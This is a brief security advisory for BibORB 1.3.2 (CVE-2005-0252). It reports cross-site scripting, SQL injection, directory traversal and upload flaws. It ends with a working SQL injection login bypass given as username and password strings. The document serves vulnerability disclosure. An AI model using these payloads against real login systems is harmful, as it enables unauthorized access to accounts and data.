BibORB 1.3.2 Login Module - Multiple SQL Injections

Related Vulnerabilities: CVE-2005-0252  
Publish Date: 17 Feb 2005
Author: Patrick Hof
                source: http://www.securityfocus.com/bid/12583/info
   
   
BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks.
   
These vulnerabilities are reported to affect BibORB version 1.3.2 and all previous versions. 

When logging in, use the following username and password:

Username: x' or 1=1 or login='x
Password: x') or 1=1 or password=md5('x